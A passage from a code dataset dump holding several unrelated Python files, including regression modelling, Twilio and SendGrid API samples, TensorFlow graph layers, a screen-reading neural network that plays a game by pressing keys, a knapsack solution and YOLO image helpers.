plt.plot(x[a:b],y2[a:b],'b', label='Predicted')\r\n plt.xlabel('x')\r\n plt.ylabel('y')\r\n plt.title(Title)\r\n plt.legend(loc='upper left')\r\n plt.show()\r\n return fig\r\n\r\n# Predict training series\r\ny_hat = mars.predict(x)\r\nx_train = list(range(0,len(y)))\r\n\r\n# Process test data\r\ntest = test[cols].astype(str)\r\nfor i in cols:\r\n for j in range(0,len(test)):\r\n test[i][j] = test[i][j].replace(\",\",\"\")\r\n \r\ntest = test.astype(float)\r\n\r\nHT = talib.HT_DCPERIOD(test[''])\r\nstd = talib.STDDEV(test[''], timeperiod=7, nbdev=1)\r\n\r\nHT = pd.DataFrame(data={'HT_DCPERIOD':HT})\r\nstd = pd.DataFrame(data={'STDDEV':std})\r\n\r\ntest = test.join(HT)\r\ntest = test.join(std)\r\n\r\navgHT1 = test['HT_DCPERIOD'].mean()\r\navgSTD = test[\"STDDEV\"].mean()\r\n\r\ntest['HT_DCPERIOD'].fillna(avgHT1, inplace=True)\r\ntest['STDDEV'].fillna(avgSTD, inplace=True)\r\n\r\ntest[''] = 
np.log1p(test['']) \r\ny1 = test['']\r\n#x1 = test.drop('',1)\r\nx1 = test\r\ndel x1['']\r\ndel x1['']\r\ndel x1['']\r\ndel x1['']\r\n\r\nfeatures = x1.dtypes[x1.dtypes != \"object\"].index\r\nfeatures_skewed = test[features].apply(lambda g: skew(g.dropna())) \r\nfeatures_skewed = features_skewed.index \r\nx1[features_skewed] = np.log1p(x1[features_skewed])\r\n\r\n# Predict Test series\r\ny_hat1 = mars.predict(x1)\r\nx_test = list(range(0, len(y1)))\r\n\r\n# Adaboost MARS\r\nboosted_mars = AdaBoostRegressor(base_estimator=mars, n_estimators=25, learning_rate=0.1, loss=\"exponential\")\r\nboosted_mars.fit(x,y)\r\n\r\n# Predict using boosted MARS\r\nyb = boosted_mars.predict(x)\r\nyb1 = boosted_mars.predict(x1)\r\n\r\n# Graphs of test/train\r\ngraph(x_train, inverse(y), inverse(y_hat), 5000, 5100, Title='MARS: Train').savefig('MARS1.png') # smaller window for visualization\r\ngraph(x_test, inverse(y1), inverse(y_hat1), 150, 250, Title='MARS: Test').savefig('MARS2.png')\r\ngraph(x_train, inverse(y), inverse(yb), 5000, 5100, Title='Adaboost MARS: Train').savefig('AB1.png') # same window boosted\r\ngraph(x_test, inverse(y1), inverse(yb1), 150, 250, Title='Adaboost MARS: Test').savefig('AB2.png')\r\n\r\n# Mean Squared Error on each case\r\nMSE1 = mean_squared_error(inverse(y), inverse(y_hat))\r\nMSE2 = mean_squared_error(inverse(y1), inverse(y_hat1))\r\nMSEB1 = mean_squared_error(inverse(y), inverse(yb))\r\nMSEB2 = mean_squared_error(inverse(y1), inverse(yb1))\r\n\r\n# R-squared\r\nR1 = r2_score(inverse(y), inverse(y_hat))\r\nR2 = r2_score(inverse(y1), inverse(y_hat1))\r\nR3 = r2_score(inverse(y), inverse(yb))\r\nR4 = r2_score(inverse(y1), inverse(yb1))\r\n\r\n# S-Statistic\r\nS1 = pd.DataFrame(((pd.DataFrame(inverse(y)).values - (pd.DataFrame(inverse(y_hat))).values)**2))\r\nS11 = np.sqrt((S1.sum(axis=0))/len(y))\r\n\r\nS2 = pd.DataFrame(((pd.DataFrame(inverse(y1)).values - (pd.DataFrame(inverse(y_hat1))).values)**2))\r\nS21 = np.sqrt((S2.sum(axis=0))/len(y1))\r\n\r\nS3 = pd.DataFrame(((pd.DataFrame(inverse(y)).values - (pd.DataFrame(inverse(yb))).values)**2))\r\nS31 = np.sqrt((S3.sum(axis=0))/len(y))\r\n\r\nS4 = pd.DataFrame(((pd.DataFrame(inverse(y1)).values - (pd.DataFrame(inverse(yb1))).values)**2))\r\nS41 = np.sqrt((S4.sum(axis=0))/len(y1))\r\n\r\nimport plotly\r\nimport plotly.graph_objs as go\r\nplotly.offline.init_notebook_mode(connected=True)\r\n\r\ntrace = go.Table(\r\n columnwidth=[72, 115, 115, 115],\r\n header=dict(values=['Type', 'MSE', 'R-Squared', 'SE of Estimate'], align=['left']*5),\r\n cells=dict(values=[['In Sample', 'Out Sample', 'In Sample (boosted)', 'Out Sample (boosted)'],\r\n [MSE1, MSE2, MSEB1, MSEB2], [R1, R2, R3, R4], [S11, S21, S31, S41]],align=['left']*5))\r\n\r\ndata = [trace] \r\nplotly.offline.plot(data, filename = 'basic_table.html')\r\n","sub_path":"MARS.py","file_name":"MARS.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495523924","text":"# Download the Python helper library from twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\n# To set up environmental variables, see http://twil.io/secure\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nfeedback = client.calls(\"CAe03b7cd806070d1f32bdb7f1046a41c0\") \\\n .feedback() \\\n 
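# Reviewer note: MARS.py above inverts the log(1+x) transform with
# np.exp(x) - 1 by hand; numpy ships np.expm1 as the numerically stable
# inverse of np.log1p. A self-contained check on hypothetical prices:
import numpy as np
prices = np.array([150.25, 151.10, 149.80])
assert np.allclose(np.expm1(np.log1p(prices)), prices)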
.fetch()\n\nprint(feedback.date_created)\n","sub_path":"rest/call-feedback/instance-get-example-1/instance-get-example-1.8.x.py","file_name":"instance-get-example-1.8.x.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"220675355","text":"import sendgrid\nfrom django.conf import settings\nfrom sendgrid.helpers.mail import *\n\n\ndef send_email_to_account(from_email, to_email, subject, message):\n sender = Email(from_email)\n receiver = Email(to_email)\n sg = sendgrid.SendGridAPIClient(apikey=settings.SENDGRID_API_KEY)\n content = Content(\"text/html\", message)\n mail = Mail(sender, subject, receiver, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n\n\n\n","sub_path":"compliance_linc/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299864945","text":"import numpy as np\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.python.ops import nn_ops\r\nfrom Layer.LayerObject import LayerObject\r\nfrom Model.utils_model import load_initial_value\r\n\r\n\r\nclass EdgeToCluster(LayerObject):\r\n \"\"\"\r\n\r\n \"\"\"\r\n required_pa = ['kernel_shape']\r\n\r\n def __init__(self,\r\n arguments: dict,\r\n parameters: dict = None,\r\n ):\r\n LayerObject.__init__(self)\r\n self.optional_pa.update({'L2_lambda': 5e-3,\r\n 'bias': True,\r\n 'batch_normalization': False,\r\n 'activation': None,\r\n 'strides': [1, 1, 1, 1],\r\n 'padding': 'VALID',\r\n 'scope': 'E2C',\r\n 'conv_fun': tf.nn.conv2d,\r\n 'use_bias': True,\r\n })\r\n self.tensors = {}\r\n\r\n self.parameters = self.set_parameters(arguments=arguments,\r\n parameters=parameters)\r\n # Cluster kernel\r\n [width, height, in_channels, out_channels] = self.parameters['kernel_shape']\r\n kernel_shape_row = [1, height, in_channels, 1]\r\n self.weight_row = tf.Variable(initial_value=self.get_initial_weight(kernel_shape=kernel_shape_row),\r\n name=self.parameters['scope'] + '/kernel_row',\r\n )\r\n self.tensors['weight_row'] = self.weight_row\r\n L2_weight_row = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_row)\r\n tf.add_to_collection('L2_loss', L2_weight_row)\r\n\r\n kernel_shape_col = [width, 1, 1, out_channels]\r\n self.weight_col = tf.Variable(initial_value=self.get_initial_weight(kernel_shape=kernel_shape_col),\r\n name=self.parameters['scope'] + '/kernel_col')\r\n self.tensors['weight_col'] = self.weight_col\r\n L2_weight_col = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_col)\r\n tf.add_to_collection('L2_loss', L2_weight_col)\r\n\r\n # build bias\r\n out_channels = self.parameters['kernel_shape'][-1]\r\n\r\n if self.parameters['bias']:\r\n initializer = tf.constant(0.0, shape=[out_channels, ])\r\n if self.parameters['load_bias']:\r\n initializer = load_initial_value(type='bias',\r\n name=self.parameters['scope'])\r\n\r\n self.bias = tf.Variable(initial_value=initializer,\r\n name=self.parameters['scope'] + '/bias',\r\n )\r\n self.tensors['bias'] = self.bias\r\n\r\n def build(self, *args, **kwargs):\r\n # Get adjacency matrix from inputs, which should be a Tensor or a dictionary\r\n adjacency_matrix = kwargs['input_tensor'] if 'input_tensor' in kwargs else kwargs['adjacency_matrix']\r\n self.tensors['input'] = adjacency_matrix\r\n self.tensors['adjacency_matrix'] = adjacency_matrix\r\n\r\n [_, _, num_nodes, _] = 
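# Reviewer note: the Twilio sample reads credentials from the environment
# while the SendGrid helper above pulls them from Django settings; either
# way the key never belongs in source control. A minimal sketch (the
# variable name is an assumption, not part of either record):
import os
api_key = os.environ.get("SENDGRID_API_KEY", "")
if not api_key:
    print("SENDGRID_API_KEY is not set; refusing to send")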
adjacency_matrix.shape.as_list()\r\n\r\n # Cluster adjacency matrix calculation\r\n neighbour_vectors = tf.split(tf.abs(adjacency_matrix), num_or_size_splits=num_nodes, axis=2)\r\n\r\n node_features = []\r\n cluster_adjacency_list = []\r\n for neighbour_vector in neighbour_vectors:\r\n cross_multiply = tf.transpose(tf.matmul(tf.transpose(neighbour_vector, perm=[0, 3, 1, 2]),\r\n tf.transpose(neighbour_vector, perm=[0, 3, 2, 1])),\r\n perm=[0, 2, 3, 1])\r\n cluster_adjacency = tf.multiply(adjacency_matrix, cross_multiply)\r\n cluster_adjacency_list.append(cluster_adjacency)\r\n node_feature_row = self.parameters['conv_fun'](input=cluster_adjacency,\r\n filter=self.weight_row,\r\n strides=self.parameters['strides'],\r\n padding=self.parameters['padding'])\r\n node_feature = self.parameters['conv_fun'](input=node_feature_row,\r\n filter=self.weight_col,\r\n strides=self.parameters['strides'],\r\n padding=self.parameters['padding'])\r\n if self.parameters['use_bias']:\r\n node_feature = tf.nn.bias_add(node_feature, self.bias)\r\n node_features.append(node_feature)\r\n node_features = tf.concat(node_features, axis=-2)\r\n node_features = tf.squeeze(node_features, axis=-3)\r\n self.tensors['cluster_adjacency'] = cluster_adjacency_list\r\n\r\n if self.parameters['activation']:\r\n node_features = self.parameters['activation'](node_features)\r\n\r\n self.tensors['node_features'] = node_features\r\n\r\n\r\nclass SelfAttentionGraphPooling(LayerObject):\r\n \"\"\"\r\n\r\n \"\"\"\r\n required_pa = ['kernel_shape']\r\n\r\n def __init__(self,\r\n arguments: dict,\r\n parameters: dict = None,\r\n ):\r\n LayerObject.__init__(self)\r\n self.optional_pa.update({'L2_lambda': 5e-3,\r\n 'activation': None,\r\n 'scope': 'SAGPool',\r\n })\r\n self.tensors = {}\r\n self.parameters = self.set_parameters(arguments=arguments,\r\n parameters=parameters)\r\n\r\n # Attention kernel\r\n initializer_att = self.get_initial_weight(kernel_shape=self.parameters['kernel_shape'])\r\n self.weight_att = tf.Variable(initial_value=initializer_att,\r\n name=self.parameters['scope'] + '/kernel',\r\n )\r\n self.tensors['weight_att'] = self.weight_att\r\n L2_att = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_att)\r\n tf.add_to_collection('L2_loss', L2_att)\r\n\r\n def build(self, *args, **kwargs):\r\n node_features = kwargs['node_features']\r\n adjacency_matrix = kwargs['adjacency_matrix']\r\n self.tensors['input'] = adjacency_matrix\r\n\r\n [_, _, num_nodes, _] = adjacency_matrix.shape.as_list()\r\n\r\n # Self-attention graph pooling\r\n adjacency_matrix = tf.squeeze(adjacency_matrix, axis=-1)\r\n y = tf.matmul(adjacency_matrix, node_features)\r\n cluster_mapping = tf.matmul(tf.reshape(y,\r\n shape=[-1, self.parameters['kernel_shape'][0]]),\r\n self.weight_att)\r\n\r\n if self.parameters['activation']:\r\n cluster_mapping = self.parameters['activation'](cluster_mapping)\r\n\r\n cluster_mapping = tf.reshape(cluster_mapping, shape=[-1, num_nodes, self.parameters['kernel_shape'][-1]])\r\n cluster_mapping = tf.nn.softmax(cluster_mapping, axis=-1)\r\n self.tensors['cluster_mapping'] = cluster_mapping\r\n\r\n self.add_loss_function()\r\n\r\n adjacency_matrix = tf.matmul(tf.matmul(a=tf.transpose(cluster_mapping, perm=[0, 2, 1]),\r\n b=adjacency_matrix),\r\n b=cluster_mapping)\r\n adjacency_matrix = tf.expand_dims(adjacency_matrix, axis=-1)\r\n node_features = tf.matmul(tf.transpose(cluster_mapping, perm=[0, 2, 1]),\r\n node_features)\r\n self.tensors['node_features'] = node_features\r\n 
self.tensors['adjacency_matrix'] = adjacency_matrix\r\n\r\n self.tensors['output'] = node_features\r\n return adjacency_matrix\r\n\r\n def add_loss_function(self):\r\n adjacency_matrix = self.tensors['input']\r\n cluster_mapping = self.tensors['cluster_mapping']\r\n\r\n link_loss = tf.squeeze(adjacency_matrix, axis=-1) - \\\r\n tf.matmul(cluster_mapping, tf.transpose(cluster_mapping, perm=[0, 2, 1]))\r\n link_loss = tf.norm(link_loss, ord='fro', axis=[1, 2])\r\n\r\n EPS = 1e-30\r\n\r\n entropy_loss = tf.reduce_mean(tf.reduce_sum(-tf.multiply(cluster_mapping,\r\n tf.log(cluster_mapping + EPS)), axis=-1))\r\n\r\n loss = link_loss + entropy_loss\r\n tf.add_to_collection('Mapping_loss', loss)\r\n","sub_path":"Layer/CNNSmallWorld.py","file_name":"CNNSmallWorld.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79935290","text":"import numpy as np\nimport scipy.ndimage\n#import pyaudio\nimport time\nimport matplotlib\nimport keyboard\nfrom pynput.keyboard import Key, Controller\n#import cv2\nimport matplotlib.pyplot as plt\nfrom mss import mss\nfrom PIL import Image\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass Mind:\n def __init__(self, exec, init_gamma):\n self.neurons = np.random.uniform(size=(count, dims))\n self.neurons[-1][-output_count:] = 0.7\n visual_map = np.mgrid[0.3:0.7:pixels * 1j, 0.3:0.7:pixels * 1j, 0.2:0.4:channels * 1j]\n visual_map = visual_map.reshape(dims, -1).T\n self.neurons[:pixels ** 2 * channels] = visual_map\n self.dists = np.sqrt(np.mean(np.square(self.neurons[None, :, :] - self.neurons[:, None, :]), axis=-1))\n self.firings = np.random.binomial(size=(firing_history, count), n=1, p=0.5)\n self.connections = (\n (self.dists > 0) *\n (self.dists < np.percentile(self.dists, percentile)) *\n np.random.uniform(size=self.dists.shape, low=-2, high=2)\n )\n self.plastic = np.ones_like(self.connections)\n # Disable connections coming into the sensory neurons\n self.connections[:, :sensory_count] = 0\n self.plastic[self.connections == 0] = 0\n # Disable connections coming out of the sensory neurons\n # self.connections[-output_count:, :] = 0\n self.gamma = init_gamma\n self.exec = exec\n self.lr_decay = 0.9999\n self.acc_decay = 0.9\n self.screen_cur = None\n self.screen_prev = None\n self.iter_num = 0\n\n self.accumulation = np.ones_like(self.connections[sensory_count:-output_count, sensory_count:-output_count])\n self.accumulation *= 1 / (1 - self.acc_decay)\n self.up = np.zeros_like(self.firings[0, sensory_count:])\n self.upcount = 0\n self.down = np.zeros_like(self.firings[0, sensory_count:])\n self.downcount = 0\n self.sight = None\n self.sound = None\n\n def output(self, keyboard_to_press):\n print(self.firings[-1][-output_count:].mean(), \"Out\")\n # if self.firings[-1][-output_count:].mean() > 0.5:\n # keyboard_to_press.press(\" \")\n # if self.firings[-1][-output_count:].mean() > self.firings[:, -output_count:].mean():\n if self.firings[-1][-output_count:].mean () >= 0.5:\n keyboard_to_press.press(\" \")\n else:\n keyboard_to_press.release(\" \")\n\n\n def reward(self):\n thought = self.firings[:, sensory_count:-output_count]\n nov = np.abs(thought[-1] - thought[-10]).mean() / thought.sum() * 2E5\n print(\"novelty\", nov)\n # self.connections[:, self.firings[-1]] *= reward_amount * (1 + nov)\n # self.connections = self.connections.clip(-limits, limits)\n # alpha = 10 if int(nov) > 0 else -10\n self.learn(nov)\n\n\n def fire(self):\n if self.sight is not 
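# Reviewer note: a plain-numpy sketch of the entropy term in
# add_loss_function above. For a soft cluster assignment S whose rows sum
# to 1, low entropy means each node commits to a single cluster; EPS
# guards log(0), matching the constant in CNNSmallWorld.py.
import numpy as np
EPS = 1e-30
S = np.array([[0.9, 0.1],
              [0.5, 0.5]])
entropy = np.mean(np.sum(-S * np.log(S + EPS), axis=-1))
print(entropy)  # the undecided second row contributes most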
None:\n visual = self.sight.flatten()\n firings_next = ((self.firings[-1] @ self.connections) > threshold).astype(float)\n # firings_next[:len(visual)] = visual > visual.mean()\n firings_next[:len(visual)] = visual / visual.max()\n # print(firings_next)\n if audiosize > 0:\n firings_next[len(visual):audvis_count] = self.sound > self.sound.mean()\n if randomsize > 0:\n firings_next[audvis_count:sensory_count] = np.random.uniform(randomsize)\n self.firings[:-1] = self.firings[1:]\n self.firings[-1] = firings_next\n # if (int(time.time()) % 10 != 0):\n # if (int(time.time() / 10) % 2 == 0):\n # print(\"Action One\", int(time.time() - base_time), end=\" \")\n # self.up += firings_next[sensory_count:].astype(int)\n # s elf.upcount += 1\n # else:\n # print(\"Action Two\", int(time.time() - base_time), end=\" \")\n # self.down += firings_next[sensory_count:].astype(int)\n # self.downcount += 1\n # else:\n # print(\"Switch Now\", int(time.time() - base_time), end=\" \")\n # print(self.firings[-1][-output_count:], np.max(np.abs(self.down / self.downcount - self.up / self.upcount)) )\n\n # Weaken old connections over time\n def decay(self):\n print(\"ITERATION: \" + str(self.iter_num))\n if self.iter_num % 3000 == 0:\n #plt.close()\n plt.imshow(self.connections)\n plt.savefig(\"dinoboi_\" + str(self.iter_num) + \".png\")\n plt.show()\n plt.close()\n self.iter_num += 1\n self.connections *= decay\n\n # Identify how well it correlated\n def learn(self, alpha=1):\n # print(\"Alpha\", alpha)\n # thought = self.firings[:, sensory_count:-output_count]\n wow = (self.firings[-2][None, :] - (1 - self.firings[-1][:, None])) * self.plastic\n #plt.imshow(wow)\n #plt.show()\n # print(self.firings[-1])\n # print(self.firings[-2])\n # print(wow)\n self.accumulation += np.abs(wow[sensory_count:-output_count, sensory_count:-output_count]) \\\n * self.gamma * alpha\n self.accumulation *= self.acc_decay\n subplastic = self.plastic[sensory_count:-output_count, sensory_count:-output_count]\n synapse_strength = np.abs(self.connections)[sensory_count:-output_count, sensory_count:-output_count]\n updates = (self.accumulation <= 0.3/(1 - self.acc_decay)) * (synapse_strength >= np.sum(synapse_strength * subplastic) / subplastic.sum())\n subplastic[updates] = 0\n # print(\"Plastic\", np.mean(self.plastic))\n self.connections += self.connections * wow * self.gamma * alpha\n self.connections = self.connections.clip(-limits, limits)\n self.gamma *= self.lr_decay\n\n # def visualize(self):\n # for neuron in range(-100,-50):\n # for steps in range(1, 2):\n # maxer = (None, 0)\n # matrixer = np.linalg.matrix_power(self.connections, steps)[:pixels**2 * channels, neuron]\n # initimage = np.zeros((pixels, pixels, channels))\n # for count in range(4):\n # for _ in range(500):\n # print(\"---\")\n # image = (1 - 1 / np.power(2, count)) * initimage + 1 / np.power(2, count) * np.random.uniform(size=(pixels, pixels, channels))\n # firing = image.flatten() @ matrixer\n # if firing > maxer[1]:\n # maxer = (image, firing)\n # initimage = maxer[0]\n # plt.imshow(((maxer[0] * 255).clip(0, 255)).astype(int))\n # plt.title(str(steps)+\",\"+str(neuron))\n # plt.show()\n def visualize(self):\n for neuron in range(-100,-90):\n try:\n sumer_max = np.zeros((pixels, pixels, channels))\n sumer_min = np.zeros((pixels, pixels, channels))\n sumer_diff = np.zeros((pixels, pixels, channels))\n for _ in range(200):\n maxer = (-1, None)\n miner = (10000, None)\n initimage_max = np.zeros((pixels, pixels, channels))\n initimage_min = np.zeros((pixels, pixels, 
channels))\n for count in range(6):\n for _ in range(100):\n image_max = (1 - 1 / np.power(1.2, count)) * initimage_max + 1 / np.power(1.2, count) * np.random.uniform(size=(pixels, pixels, channels))\n image_min = (1 - 1 / np.power(1.2, count)) * initimage_min + 1 / np.power(1.2, count) * np.random.uniform(size=(pixels, pixels, channels))\n fire_max = np.zeros_like(self.firings[-1])\n fire_min = np.zeros_like(self.firings[-1])\n for c in range(3):\n # fire[:pixels ** 2 * channels] = (image > image.mean()).flatten()\n fire_max[:pixels ** 2 * channels] = image_max.flatten()\n fire_min[:pixels ** 2 * channels] = image_min.flatten()\n fire_max = ((fire_max @ self.connections) > threshold).astype(float)\n fire_min = ((fire_min @ self.connections) > threshold).astype(float)\n fire_max = fire_max @ self.connections\n fire_min = fire_min @ self.connections\n if fire_max[neuron] > maxer[0]:\n maxer = (fire_max[neuron], image_max)\n if fire_min[neuron] < miner[0]:\n miner = (fire_min[neuron], image_min)\n initimage_max = maxer[1]\n initimage_min = miner[1]\n # plt.imshow(((maxer[1] * 255).clip(0, 255)).astype(int))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.show()\n # plt.imshow(((miner[1] * 255).clip(0, 255)).astype(int))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.show()\n diff = maxer[1] - miner[1]\n sumer_diff += diff\n sumer_max += maxer[1]\n sumer_min += miner[1]\n # plt.imshow((diff - diff.min())/(diff.max() - diff.min()))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.title(str(neuron))\n # plt.show()\n print(\"----\")\n plt.imshow((sumer_max - sumer_max.min()) / (sumer_max.max() - sumer_max.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Max\" + str(neuron))\n plt.show()\n\n plt.imshow((sumer_min - sumer_min.min()) / (sumer_min.max() - sumer_min.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Min\" + str(neuron))\n plt.show()\n\n plt.imshow((sumer_diff - sumer_diff.min()) / (sumer_diff.max() - sumer_diff.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Diff\" + str(neuron))\n plt.show()\n except:\n pass\n\n def screenshot(self):\n sct = mss()\n im = sct.grab({\"top\":100 ,\"left\":0, \"width\":500, \"height\":230})\n rgb = Image.frombytes(\"RGB\", im.size, im.bgra, \"raw\", \"BGRX\")\n visual = rgb.resize(size=(pixels, pixels), resample=Image.BICUBIC)\n visual = np.array(visual)\n # plt.imshow(visual)\n # plt.show()\n return visual\n\n\n def audiovision(self, cam, mic=None):\n if audiosize > 0:\n p = pyaudio.PyAudio()\n mic = p.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True, frames_per_buffer=audiosize)\n data = mic.read(audiosize)\n self.sound = np.fromstring(data, dtype=np.int16)\n else:\n self.sound = None\n\n if cam is not None:\n ret, frame = cam.read()\n base = cv2.resize(frame, dsize=(pixels, pixels), interpolation=cv2.INTER_AREA)\n self.sight = base.mean(-1)[:, :, None]\n else:\n self.sight = self.screenshot()\n self.screen_prev = self.screen_cur\n self.screen_cur = self.sight.copy()\n\n\ncount = 800\n#count = 3\ndims = 3\npercentile = 10\naudiosize = 0\nrandomsize = 50\n#randomsize = 0\nfiring_history = 50\npixels = 10\n#pixels = 1\nchannels = 1\naudvis_count = pixels ** 2 
* channels + audiosize\nsensory_count = audvis_count + randomsize\n#output_count = 50\noutput_count = 10\ngamma = 0.0003\n#gamma = 0.002\nthreshold = 0.1\nlimits = 10\nreward_amount = 2.0\ndecay = 1 - 1E-8\nbase_time = 1549200000\nvideo_stream = False\nexp_decay = np.power(gamma, -np.arange(firing_history - 1))[None, :, None]\n\n\ndef main():\n if video_stream:\n cam = cv2.VideoCapture(0)\n cam.set(3, 36)\n cam.set(4, 64)\n else:\n cam = None\n count = 0\n n = 100000\n executor = ThreadPoolExecutor(max_workers=3)\n george = Mind(executor, gamma)\n keyboard_press = Controller()\n\n def input():\n george.audiovision(cam)\n\n def output(keyboard):\n george.output(keyboard)\n\n def processing(count):\n george.fire()\n # thought = george.firings[:, sensory_count:-output_count]\n thought = george.firings[:, :audvis_count]\n # nov = np.abs(thought[-1] - thought[-2]).mean() / thought.sum() * 2E5\n if george.screen_prev is not None:\n nov = np.abs(george.screen_cur - george.screen_prev).mean()\n else:\n nov = 1\n # nov = (george.sight.mean() / george.sight.max() - 0.98) * 40\n print(nov)\n if nov > 0.0:\n george.learn(1)\n else:\n george.learn(-2)\n george.decay()\n if (count % n == n - 1):\n george.visualize()\n\n def show():\n if george.sight is not None:\n plt.imshow(george.sight)\n plt.show()\n\n while True:\n #show()\n input()\n count += 1\n processing(count)\n output(keyboard_press)\n time.sleep(0.001)\n # if keyboard.is_pressed(\"space\"): #if key space is pressed.You can also use right,left,up,down and others like a,b,c,etc.\n # print(\"Rewarded\")\n # george.reward()\n\n\nmain()\n","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"466639747","text":"import sys\ninput = sys.stdin.readline\nfrom heapq import heapify, heappop, heappush\n\nN, K = map(int,input().strip().split())\nheap = []\nfor _ in range(N):\n M, V = map(int, input().strip().split())\n heappush(heap, [M,V])\n\nbags = []\nfor _ in range(K):\n heappush(bags, int(input()))\n\nable = []\nresult = 0\n\nwhile bags :\n now_c = heappop(bags)\n\n while heap and heap[0][0] <= now_c :\n tmp_m, tmp_v = heappop(heap)\n heappush(able, -tmp_v)\n\n if able :\n result -= heappop(able)\n\nprint(result)\n\n\n\n\n#시간초과 ;;\n# N, K = map(int,input().strip().split())\n# heap = []\n# for _ in range(N):\n# M, V = map(int, input().strip().split())\n# if V == 0 :\n# continue\n# heap.append([-V,M])\n# heapify(heap)\n# bags = [ [int(input().strip()), False] for _ in range(K) ]\n# bags.sort()\n\n# count = 0\n# result = 0\n\n# while count < K and heap :\n# v, m = heappop(heap)\n\n# for i in range(K):\n# if bags[i][1] :\n# continue\n# if bags[i][0] >= m :\n# bags[i][1] = True\n# count += 1\n# result -= v\n# break\n\n# print(result)","sub_path":"2021_spring/2021_05_07/1202_JH.py","file_name":"1202_JH.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"210611764","text":"import numpy as np\n\ndef simple_gradient(x, y, theta):\n \"\"\"\n Computes a gradient vector from three non-empty numpy.ndarray, without any for-loop.\n The three arrays must have compatible dimensions. \n Args:\n x: has to be an numpy.ndarray, a vector of dimension m * 1. \n y: has to be an numpy.ndarray, a vector of dimension m * 1.\n theta: has to be an numpy.ndarray, a 2 * 1 vector. 
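# Reviewer note: the accepted solution above (1202_JH.py) is a classic
# two-heap greedy; a compact restatement with hypothetical data:
import heapq
jewels = [(2, 99), (5, 23)]   # (weight, value)
bags = [10, 2]
jewels.sort()
bags.sort()
best, i, total = [], 0, 0
for cap in bags:
    while i < len(jewels) and jewels[i][0] <= cap:
        heapq.heappush(best, -jewels[i][1])   # max-heap via negation
        i += 1
    if best:
        total -= heapq.heappop(best)          # take the best jewel that fits
print(total)  # 122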
\n Returns:\n The gradient as a numpy.ndarray, a vector of dimension 2 * 1. \n None if x, y, or theta are empty numpy.ndarray.\n None if x, y and theta do not have compatible dimensions.\n \"\"\"\n if x.shape[0] * y.shape[0] * theta.shape[0] == 0:\n return None\n if x.shape[0] != y.shape[0] or theta.shape[0] != 2:\n return None\n\n x = add_intercept(x)\n\n result = [\n forumla(x, y, theta, 0),\n forumla(x, y, theta, 1)\n ]\n return result\n\ndef forumla(x, y, theta, j):\n length = x.shape[0]\n return theta[j] - (1/length) * sum(((x.dot(theta) - y) * x[:,j:][:,0]))\n\ndef add_intercept(x):\n if x.shape[0] == 0:\n return None\n\n if 1 == len(x.shape):\n x = x.reshape(x.shape[0], 1)\n\n return np.insert(x, 0, 1, axis=1)","sub_path":"day01/ex03/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"294584528","text":"from __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport cv2\nimport numpy as np\nimport functools\nfrom bbox import bbox_iou_boxclass,DetectionBox\nimport math\n\ndef letterbox_image(img,inp_dim):\n '''\n img cv.imread()\n inp_dim networds input image weight\n 调整图像大小,保持宽高比一致,并用颜色填充左边区域(128,128,128)\n '''\n \n img_w ,img_h = img.shape[1],img.shape[0]\n w,h = inp_dim\n temp_min = min(w/img_w,h/img_h)\n new_w = int(img_w * temp_min)\n new_h = int(img_h * temp_min)\n \n resized_image = cv2.resize(img,(new_w,new_h),interpolation= cv2.INTER_CUBIC)\n canvas = np.full((inp_dim[1],inp_dim[0],3),128)\n canvas[(h-new_h)//2:(h-new_h)//2+new_h,(w-new_w)//2:(w-new_w)//2+new_w,:] = resized_image\n return canvas\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters())\n\ndef convert2cpu(matrix):\n if matrix.is_cuda:\n return torch.FloatTensor(matrix.size()).copy_(matrix)\n else:\n return matrix\n\ndef prep_image(img,inp_dim):\n \"\"\"\n Prepare image for inputting to the neural network\n Retun a torch Variable\n\n openccv loads an image as an numpy array BGR\n Pytorch's image input format is (Batches * Channels * Height * Width)\n \"\"\"\n orig_im = 